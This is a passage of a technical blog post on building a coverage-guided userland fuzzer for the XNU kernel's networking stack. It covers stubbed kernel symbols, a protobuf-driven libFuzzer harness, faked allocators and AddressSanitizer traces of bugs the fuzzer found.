1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_input was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling ip_input.
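
To illustrate the linked-list idea, here is a deliberately simplified stand-in for an mbuf chain. The struct toy_mbuf and its helpers are hypothetical: the real struct mbuf in XNU carries much more metadata, and this sketch only shows how a fuzzer-provided byte buffer could be split into fixed-size linked buffers before being handed to an input function.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define TOY_MBUF_DATA 64

/* Hypothetical, simplified buffer; not XNU's struct mbuf. */
struct toy_mbuf {
    struct toy_mbuf *next;             /* next buffer in the chain */
    size_t len;                        /* bytes used in data */
    unsigned char data[TOY_MBUF_DATA];
};

static void toy_mbuf_free(struct toy_mbuf *m) {
    while (m != NULL) {
        struct toy_mbuf *next = m->next;
        free(m);
        m = next;
    }
}

/* Copies buf into a chain of buffers holding at most TOY_MBUF_DATA bytes
 * each. Returns NULL for empty input or on allocation failure. */
static struct toy_mbuf *toy_mbuf_from_bytes(const unsigned char *buf, size_t len) {
    struct toy_mbuf *head = NULL;
    struct toy_mbuf **tail = &head;
    while (len > 0) {
        struct toy_mbuf *m = calloc(1, sizeof(*m));
        if (m == NULL) {
            toy_mbuf_free(head);
            return NULL;
        }
        m->len = len < TOY_MBUF_DATA ? len : TOY_MBUF_DATA;
        memcpy(m->data, buf, m->len);
        buf += m->len;
        len -= m->len;
        *tail = m;
        tail = &m->next;
    }
    return head;
}

/* Total number of payload bytes in the chain. */
static size_t toy_mbuf_chain_len(const struct toy_mbuf *m) {
    size_t total = 0;
    for (; m != NULL; m = m->next)
        total += m->len;
    return total;
}
```

A 150 byte input, for example, becomes a chain of three buffers holding 64, 64 and 22 bytes.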

I was surprised by how easy it was to work with the network stack compared to the syscall interface. ip_input and ip6_input are pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage-guided fuzzers, including this libFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.
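The corpus-admission rule at the heart of this hill climbing can be sketched in a few lines. This is a toy model, not libFuzzer's or AFL's implementation: toy_target_coverage stands in for an instrumented target with four nested validation checks, and toy_corpus_offer keeps an input only if it reaches an edge that no earlier input reached. All names here are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Toy target: every validation check that passes "covers" one more edge.
 * The returned value is a bitmask of covered edges. */
unsigned toy_target_coverage(const char *input, size_t len) {
  unsigned edges = 0;
  if (len > 0 && input[0] == 'F') {
    edges |= 1u << 0;
    if (len > 1 && input[1] == 'U') {
      edges |= 1u << 1;
      if (len > 2 && input[2] == 'Z') {
        edges |= 1u << 2;
        if (len > 3 && input[3] == 'Z') {
          edges |= 1u << 3;
        }
      }
    }
  }
  return edges;
}

struct toy_corpus {
  unsigned seen_edges; /* union of all coverage observed so far */
  char inputs[16][8];  /* saved inputs, at most 8 bytes each */
  size_t lens[16];
  size_t count;
};

/* Save the input only if it reaches an edge no earlier input reached. */
bool toy_corpus_offer(struct toy_corpus *c, const char *input, size_t len) {
  unsigned edges = toy_target_coverage(input, len);
  if ((edges & ~c->seen_edges) == 0) {
    return false; /* nothing new: discard the mutant */
  }
  if (c->count == 16 || len > sizeof(c->inputs[0])) {
    return false; /* toy capacity limits */
  }
  memcpy(c->inputs[c->count], input, len);
  c->lens[c->count] = len;
  c->count++;
  c->seen_edges |= edges;
  return true;
}
```

A real fuzzer wraps this rule in a loop that picks a saved input, mutates it, and offers the mutant back to the corpus. Because "FAAA" is kept once it passes the first check, the next useful mutation only has to get one more byte right, which is why dependent sequences get discovered one step at a time.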

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:

project(libxnu)

set(XNU_DEFINES

    -DAPPLE

    -DKERNEL

    # ...

)

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    bsd/net/if.c

    bsd/netinet/ip_input.c

    # ...

)

add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:

      _if_clone_detach in libxnu.a(if.c.o)

  "_zfree", referenced from:

      _kqueue_destroy in libxnu.a(kern_event.c.o)

      _knote_free in libxnu.a(kern_event.c.o)

      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)

      _kev_delete in libxnu.a(kern_event.c.o)

      _pipepair_alloc in libxnu.a(sys_pipe.c.o)

      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)

      _so_cache_timer in libxnu.a(uipc_socket.c.o)

      ...

  "_zinit", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _pipeinit in libxnu.a(sys_pipe.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _unp_init in libxnu.a(uipc_usrreq.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      ...

  "_zone_change", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      _ifa_init in libxnu.a(if.c.o)

      _if_clone_attach in libxnu.a(if.c.o)

      ...

ld: symbol(s) not found for architecture x86_64

clang: error: linker command failed with exit code 1 (use -v to see invocation)

ninja: build stopped: subcommand failed.


To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. The same goal could be achieved with linker flags, but this solution was simple enough and gave me nice backtraces whenever I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#include <kern/assert.h>

#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {

  printf("%s: assert failed on line %d: %s\n", file, line, expression);

  __builtin_trap();

}

void IOBSDGetPlatformUUID() { assert(false); }

void IOMapperInsertPage() { assert(false); }

// ...


Then we just link this file into the XNU library we’re building by adding it to the source list:

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    # ...

    fuzz/syscall_wrappers.c

    fuzz/ioctl.c

    fuzz/backend.c

    fuzz/stubs.c

    fuzz/fake_impls.c

)


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,

                                                          socklen_t* anamelen,

                                                          int* retval) {

  struct accept_args uap = {

      .s = s,

      .name = name,

      .anamelen = anamelen,

  };

  return accept(kernproc, &uap, retval);

}

Note the visibility attribute that explicitly exports the symbol from the library. Because these wrappers are so simple, I wrote a script called generate_fuzzer.py that generates them from syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was the ability to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer

                       PRIVATE -g

                               -std=c++11

                               -Werror

                               -Wno-address-of-packed-member

                               ${FUZZER_CXX_FLAGS})

if(APPLE)

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})

else()

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)

endif(APPLE)

Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. libprotobuf-mutator is a library that plugs into libFuzzer and knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage-guided feedback. This is a very powerful combination.

message Socket {

  required Domain domain = 1;

  required SoType so_type = 2;

  required Protocol protocol = 3;

  // TODO: options, e.g. SO_ACCEPTCONN

}

message Close {

  required FileDescriptor fd = 1;

}

message SetSocketOpt {

  optional Protocol level = 1;

  optional SocketOptName name = 2;

  // TODO(nedwill): structure for val

  optional bytes val = 3;

  optional FileDescriptor fd = 4;

}

message Command {

  oneof command {

    Packet ip_input = 1;

    SetSocketOpt set_sock_opt = 2;

    Socket socket = 3;

    Close close = 4;

  }

}

message Session {

  repeated Command commands = 1;

  required bytes data_provider = 2;

}

I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of “commands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a “Socket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one “Session” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(const Session &session) {

// ...

  std::set<int> open_fds;

  for (const Command &command : session.commands()) {

    int retval = 0;

    switch (command.command_case()) {

      case Command::kSocket: {

        int fd = 0;

        int err = socket_wrapper(command.socket().domain(),

                                 command.socket().so_type(),

                                 command.socket().protocol(), &fd);

        if (err == 0) {

          // Make sure we're tracking fds properly.

          if (open_fds.find(fd) != open_fds.end()) {

            printf("Found existing fd %d\n", fd);

            assert(false);

          }

          open_fds.insert(fd);

        }

        break;

      }

      case Command::kClose: {

        open_fds.erase(command.close().fd());

        close_wrapper(command.close().fd(), nullptr);

        break;

      }

      case Command::kSetSockOpt: {

        int s = command.set_sock_opt().fd();

        int level = command.set_sock_opt().level();

        int name = command.set_sock_opt().name();

        size_t size = command.set_sock_opt().val().size();

        std::unique_ptr<char[]> val(new char[size]);

        memcpy(val.get(), command.set_sock_opt().val().data(), size);

        setsockopt_wrapper(s, level, name, val.get(), size, nullptr);

        break;

      }

      // ... (other commands elided)

    }

  }

}

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP:

message Packet {

  oneof packet {

    TcpPacket tcp_packet = 1;

  }

}

message TcpPacket {

  required IpHdr ip_hdr = 1;

  required TcpHdr tcp_hdr = 2;

  optional bytes data = 3;

}

message IpHdr {

  required uint32 ip_hl = 1;

  required IpVersion ip_v = 2;

  required uint32 ip_tos = 3;

  required uint32 ip_len = 4;

  required uint32 ip_id = 5;

  required uint32 ip_off = 6;

  required uint32 ip_ttl = 7;

  required Protocol ip_p = 8;

  required InAddr ip_src = 9;

  required InAddr ip_dst = 10;

}

message TcpHdr {

  required Port th_sport = 1;

  required Port th_dport = 2;

  required TcpSeq th_seq = 3;

  required TcpSeq th_ack = 4;

  required uint32 th_off = 5;

  repeated TcpFlag th_flags = 6;

  required uint32 th_win = 7;

  required uint32 th_sum = 8;

  required uint32 th_urp = 9;

  // Ned's extensions

  required bool is_pure_syn = 10;

  required bool is_pure_ack = 11;

}

Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::string get_tcp_hdr(const TcpHdr &hdr) {

  struct tcphdr tcphdr = {

      .th_sport = (unsigned short)hdr.th_sport(),

      .th_dport = (unsigned short)hdr.th_dport(),

      .th_seq = __builtin_bswap32(hdr.th_seq()),

      .th_ack = __builtin_bswap32(hdr.th_ack()),

      .th_off = hdr.th_off(),

      .th_flags = 0,

      .th_win = (unsigned short)hdr.th_win(),

      .th_sum = 0, // TODO(nedwill): calculate the checksum instead of skipping it

      .th_urp = (unsigned short)hdr.th_urp(),

  };

  for (const int flag : hdr.th_flags()) {

    tcphdr.th_flags ^= flag;

  }

  // Prefer pure syn

  if (hdr.is_pure_syn()) {

    tcphdr.th_flags &= ~(TH_RST | TH_ACK);

    tcphdr.th_flags |= TH_SYN;

  } else if (hdr.is_pure_ack()) {

    tcphdr.th_flags &= ~(TH_RST | TH_SYN);

    tcphdr.th_flags |= TH_ACK;

  }

  std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr));

  return dat;

}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation.
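The TODO in get_tcp_hdr leaves th_sum at zero. For reference, the core of the checksum used by IP, TCP, and UDP is the one's-complement sum described in RFC 1071, sketched below. This is not code from sockfuzzer, and internet_checksum is a name chosen for this example. A real TCP checksum would also have to cover a pseudo-header (source and destination addresses, protocol, and TCP length), which this sketch leaves out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One's-complement Internet checksum (RFC 1071) over a byte buffer.
 * Bytes are combined as big-endian 16-bit words; an odd trailing byte is
 * padded with a zero byte. Intended for packet-sized buffers: the 32-bit
 * accumulator is only folded once at the end. */
uint16_t internet_checksum(const uint8_t *data, size_t len) {
  uint32_t sum = 0;
  while (len > 1) {
    sum += ((uint32_t)data[0] << 8) | data[1];
    data += 2;
    len -= 2;
  }
  if (len == 1) {
    sum += (uint32_t)data[0] << 8;
  }
  /* Fold the carries back into the low 16 bits. */
  while (sum >> 16) {
    sum = (sum & 0xFFFF) + (sum >> 16);
  }
  return (uint16_t)~sum;
}
```

The returned value is meant to be written into the header with its high byte first. A useful sanity check is that recomputing the checksum over data that already includes a correct checksum field yields zero.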

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used.

We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.

I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just “nop” out functionality that we don’t care about. We’ll cover these decisions in more detail in the sections that follow. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach saved me a lot of time and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland).

Booting Up

As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here’s an example crash that occurs without the one time kernel bootup initialization:

    #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3

    #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24

    #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10

    #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10

    #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized:

static int

pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out)

{

        struct pipepair *pp = zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void

pipeinit(void)

{

        nbigpipe = 0;

        vm_size_t zone_size;

        zone_size = 8192 * sizeof(struct pipepair);

        pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone");

Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default"))) bool initialize_network() {

  mcache_init();

  mbinit();

  eventhandler_init();

  pipeinit();

  dlil_init();

  socketinit();

  domaininit();

  loopattach();

  ether_family_init();

  tcp_cc_init();

  net_init_run();

  int res = necp_init();

  assert(!res);

  return true;

}


The original bsd_init is 683 lines long, but our initialize_network clone is just the short snippet above. I want to remark how cool I found it that you could “boot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this “boot” relies on dynamic allocation, let’s look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to “high-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: “classic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbufs (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

struct zone {

  uintptr_t size;

};

struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc,

                   const char* name) {

  struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone));

  zone->size = size;

  return zone;

}

void* zalloc(struct zone* zone) {

  assert(zone != NULL);

  return calloc(1, zone->size);

}

void zfree(void* zone, void* dat) {

  (void)zone;

  free(dat);

}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the “client” networking code.

struct m_hdr {

        struct mbuf     *mh_next;       /* next buffer in chain */

        struct mbuf     *mh_nextpkt;    /* next chain in queue/record */

        caddr_t         mh_data;        /* location of data */

        int32_t         mh_len;         /* amount of data in this mbuf */

        u_int16_t       mh_type;        /* type of data in this mbuf */

        u_int16_t       mh_flags;       /* flags; see below */

};

/*

 * The mbuf object

 */

struct mbuf {

        struct m_hdr m_hdr;

        union {

                struct {

                        struct pkthdr MH_pkthdr;        /* M_PKTHDR set */

                        union {

                                struct m_ext MH_ext;    /* M_EXT set */

                                char    MH_databuf[_MHLEN];

                        } MH_dat;

                } MH;

                char    M_databuf[_MLEN];               /* !M_PKTHDR, !M_EXT */

        } M_dat;

};


I didn’t include the pkthdr or m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately ASAN can help manage these allocations, so we can detect some bugs with this modification.
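The inline-versus-external decision can be sketched roughly as follows. This is not the sockfuzzer implementation: struct fake_mbuf, FAKE_M_EXT, the 128-byte inline size, and the 256-byte alignment are all assumptions made up for this example. Only posix_memalign and the idea of flagging external storage come from the description above.

```c
#define _POSIX_C_SOURCE 200112L
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define FAKE_M_EXT 0x1      /* data lives in a separate external buffer */
#define FAKE_INLINE_LEN 128 /* assumed inline capacity, not XNU's value */
#define FAKE_ALIGN 256      /* assumed alignment, not XNU's value */

/* Hypothetical simplified mbuf: one header plus inline or external data. */
struct fake_mbuf {
  unsigned char *data;    /* points at inline_buf or ext_buf */
  size_t len;             /* bytes of payload */
  unsigned flags;         /* FAKE_M_EXT when ext_buf is in use */
  unsigned char *ext_buf; /* owned external storage, or NULL */
  unsigned char inline_buf[FAKE_INLINE_LEN];
};

/* Allocate an aligned mbuf on the host heap so ASAN can track it. */
struct fake_mbuf *fake_mbuf_alloc(const void *bytes, size_t len) {
  void *mem = NULL;
  if (posix_memalign(&mem, FAKE_ALIGN, sizeof(struct fake_mbuf)) != 0) {
    return NULL;
  }
  struct fake_mbuf *m = mem;
  memset(m, 0, sizeof(*m));
  if (len <= FAKE_INLINE_LEN) {
    m->data = m->inline_buf; /* small payload: keep it inline */
  } else {
    m->ext_buf = malloc(len); /* large payload: one external buffer */
    if (m->ext_buf == NULL) {
      free(m);
      return NULL;
    }
    m->flags |= FAKE_M_EXT;
    m->data = m->ext_buf;
  }
  if (len > 0) {
    memcpy(m->data, bytes, len);
  }
  m->len = len;
  return m;
}

/* Release the mbuf and any external buffer it owns. */
void fake_mbuf_free(struct fake_mbuf *m) {
  if (m == NULL) {
    return;
  }
  if (m->flags & FAKE_M_EXT) {
    free(m->ext_buf);
  }
  free(m);
}
```

Because every mbuf and external buffer is an ordinary heap allocation here, a sanitizer build can flag out-of-bounds accesses, double frees, and use-after-free reads on them directly.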

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issue linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf:

==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8

READ of size 1 at 0x61500026afe5 thread T0

    #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25

    #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000)

freed by thread T0 here:

    #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3

    #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7

    #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3

    #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8

    #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


